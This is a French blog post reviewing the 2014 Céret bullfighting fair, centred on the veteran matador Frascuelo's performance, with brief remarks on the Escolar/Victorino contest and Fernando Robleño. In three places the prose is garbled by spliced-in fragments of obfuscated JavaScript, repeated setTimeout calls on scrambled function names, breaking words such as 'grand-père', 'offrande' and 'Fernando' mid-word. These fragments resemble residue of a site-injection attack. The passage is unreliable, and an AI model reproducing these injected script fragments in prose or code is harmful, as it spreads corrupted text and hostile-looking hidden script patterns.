FERIA DE CERET 2014. FRASCUELO INSPIRE

Lorsque nous avons appris les cartels de Céret, sur la route de Ciudad Rodrigo, je me souviens des sourires, voire des moqueries en découvrant le nom de Frascuelo.  » Il torée encore ? Quel âge peut-il donc avoir ? Mon grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and-père l'adorait..."

Ce dimanche 13 juillet, vers 20h30, ceux qui étaient sur les gradins de la dernière Plaza de Catalogne auront été unanimes : " Le « Vieux » venait de donner la leçon".
66 ans aux cèpes, 40 d'alternative, une vie chaotique et quelques sorties a hombros des arènes les plus dures au compteur, dont Las Ventas, il conserve l'allure d'un jeune homme et incarne la synthèse du toréo.

La cape est tenue d'une main avec une classe folle, les chicuelinas serrées, les pieds joints. A la muleta ses naturelles de face ont le parfum de la tauromachie d'hier.
Il débouche le flacon en souriant face aux toros choisis pour leur sauvagerie par les irréductibles de l'ADAC.

Au fur et a mesure que la faena se déplace, il se tourne vers le quartier d'arène proche et dit :"para ustedes" puis cite le toro comme une offrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande...mais à la fin, l'oreille reste pour lui. Frascuelo fera sa vuelta avec elle en main. Son cœur, il nous le prête, mais l'oreille il la garde.
Merci maestro.

P.S. : Quant au concours d'Albaserada (Escolar ,Victorino) même si on ne s'ennuya jamais, ce ne fut pas la fête espérée.
Au prix du toro lidié, seuls les éleveurs y trouvèrent leur compte !
Fernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando Robleño, devenu le torero de base de la Feria depuis 2 ans, montra par instants qu'il savait l'intérêt que lui portent les Cérétans.

FOTOS Antoine Mateos

mateosok2

mateosok1

Les commentaires sont fermés.